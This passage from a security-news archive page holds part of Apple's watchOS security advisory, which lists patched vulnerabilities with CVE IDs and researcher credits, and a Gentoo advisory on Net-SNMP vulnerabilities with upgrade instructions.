CVE-2022-42795: ryuzaki

AppleAVD  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: This issue was addressed with improved checks.  
CVE-2022-32907: Natalie Silvanovich of Google Project Zero, Antonio  
Zekic (@antoniozekic) and John Aakerblom (@jaakerblom), ABC Research  
s.r.o, Yinyi Wu, Tommaso Bianco (@cutesmilee__)

Apple Neural Engine  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to leak sensitive kernel state  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32858: Mohamed Ghannam (@_simo36)

Apple Neural Engine  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32898: Mohamed Ghannam (@_simo36)  
CVE-2022-32899: Mohamed Ghannam (@_simo36)  
CVE-2022-32889: Mohamed Ghannam (@_simo36)

Contacts  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed with improved checks.  
CVE-2022-32854: Holger Fuhrmannek of Deutsche Telekom Security

Exchange  
Available for: Apple Watch Series 4 and later  
Impact: A user in a privileged network position may be able to  
intercept mail credentials  
Description: A logic issue was addressed with improved restrictions.  
CVE-2022-32928: an anonymous researcher

GPU Drivers  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-32903: an anonymous researcher

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing an image may lead to a denial-of-service  
Description: A denial-of-service issue was addressed with improved  
validation.  
CVE-2022-1622

Image Processing  
Available for: Apple Watch Series 4 and later  
Impact: A sandboxed app may be able to determine which app is  
currently using the camera  
Description: The issue was addressed with additional restrictions on  
the observability of app states.  
CVE-2022-32913: Yiğit Can YILMAZ (@yilmazcanyigit)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32864: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32866: Linus Henze of Pinauten GmbH (pinauten.de)  
CVE-2022-32911: Zweig of Kunlun Lab

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-32914: Zweig of Kunlun Lab

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An application may be able to execute arbitrary code with  
kernel privileges. Apple is aware of a report that this issue may  
have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32894: an anonymous researcher

Maps  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: A logic issue was addressed with improved restrictions.  
CVE-2022-32883: Ron Masas of breakpointhq.com

MediaLibrary  
Available for: Apple Watch Series 4 and later  
Impact: A user may be able to elevate privileges  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-32908: an anonymous researcher

Notifications  
Available for: Apple Watch Series 4 and later  
Impact: A user with physical access to a device may be able to access  
contacts from the lock screen  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32879: Ubeydullah Sümer

Sandbox  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to modify protected parts of the file  
system  
Description: A logic issue was addressed with improved restrictions.  
CVE-2022-32881: Csaba Fitzl (@theevilbit) of Offensive Security

Siri  
Available for: Apple Watch Series 4 and later  
Impact: A user with physical access to a device may be able to use  
Siri to obtain some call history information  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32870: Andrew Goldberg of The McCombs School of Business,  
The University of Texas at Austin (linkedin.com/in/andrew-goldberg-/)

SQLite  
Available for: Apple Watch Series 4 and later  
Impact: A remote user may be able to cause a denial-of-service  
Description: This issue was addressed with improved checks.  
CVE-2021-36690

Watch app  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read a persistent device identifier  
Description: This issue was addressed with improved entitlements.  
CVE-2022-32835: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Weather  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32875: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A buffer overflow issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 241969  
CVE-2022-32886: P1umer(@p1umer), afang(@afang5472),  
xmzyshypnc(@xmzyshypnc1)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
WebKit Bugzilla: 242047  
CVE-2022-32888: P1umer (@p1umer)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
WebKit Bugzilla: 242762  
CVE-2022-32912: Jeonghoon Shin (@singi21a) at Theori working with  
Trend Micro Zero Day Initiative

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 243236  
CVE-2022-32891: @real_as3617, an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
WebKit Bugzilla: 243557  
CVE-2022-32893: an anonymous researcher

Wi-Fi  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32925: Wang Yu of Cyberserval

Additional recognition

AppleCredentialManager  
We would like to acknowledge @jonathandata1 for their assistance.

FaceTime  
We would like to acknowledge an anonymous researcher for their  
assistance.

Kernel  
We would like to acknowledge an anonymous researcher for their  
assistance.

Mail  
We would like to acknowledge an anonymous researcher for their  
assistance.

Sandbox  
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive  
Security for their assistance.

UIKit  
We would like to acknowledge Aleczander Ewing for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher for their  
assistance.

WebRTC  
We would like to acknowledge an anonymous researcher for their  
assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNbKpMACgkQ4RjMIDke  
Nxmucg/+L8XHGSij8F6IoUuvCuJ3u1IUfHXE5LK0BafEddVzKS87fct6KP7L3kvE  
SfdJVCOrmfVImKn3etfpDgwgZoYqF8cxeb9PO7ObVT/15GBBfuAGc+rNZ3oAeWDJ  
iYFiiWZrDnj9gz6bo0jn4dN9q8/X9iIjUCujPdkrFzXqa+KkVub9wv6/jtJGQA3O  
YgDIaV0UvcJss0uhJR9GX+A3+4zeJgUiNq2a/1qf1nOFh/O59pbHNWYnHzB91/FE  
8V+EJgfxaK/M3zDfonPI9SMa26lO+VJejOnco98of7Kk+yNoOy6xTIkBLLBURMqN  
Jxz0I3WNxjM5TQ61WzINvd198gqjyac2nVg1S4Gqkekk6VXwmQR5zaqQmzePQqp3  
qw+qhICNqFSUJPyIDQwnuCaf1MlfEj57ustS5d8g5M1fNXBlnrtJVpI/CcPIAYvo  
7pQZy/6QptmrPp6Lgv6k/Vtxi/H5s8/tHCnhtvczbdpH6lsPmCJlDSdzsK1L8krP  
82WcjBulywZWfZ4IBNi52lD+EWlmzHomcYVGQcbd0/1FLE8h5meKCvYxM5ovfk1F  
PloJY8FQgJ3b+NcTQuTD4dZ7rc+Le5WqqD4EAgYbOKgAD6Fqy47eY8yNcYJw0qXP  
5jll4mfHUJe7NHc9frZKrdpH0Cl8o9lRdRPpM+kLqteQlpNOjao=  
=Ty+V  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-10-27-13

Gentoo Linux Security Advisory 202210-29 - Multiple vulnerabilities have been discovered in Net-SNMP, the worst of which could result in denial of service. Versions less than 5.9.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-29  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Net-SNMP: Multiple Vulnerabilities  
     Date: October 31, 2022  
     Bugs: #855500  
       ID: 202210-29

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Net-SNMP, the worst of  
which could result in denial of service.

Background  
==========

Net-SNMP is a suite of applications used to implement the Simple Network  
Management Protocol.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  net-analyzer/net-snmp      < 5.9.2                      >= 5.9.2

Description  
===========

Multiple vulnerabilities have been discovered in Net-SNMP. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Net-SNMP users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-analyzer/net-snmp-5.9.2"

References  
==========

[ 1 ] CVE-2022-24805  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24805  
[ 2 ] CVE-2022-24806  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24806  
[ 3 ] CVE-2022-24807  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24807  
[ 4 ] CVE-2022-24808  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24808  
[ 5 ] CVE-2022-24809  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24809  
[ 6 ] CVE-2022-24810  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24810

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-29

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Source

Packet Storm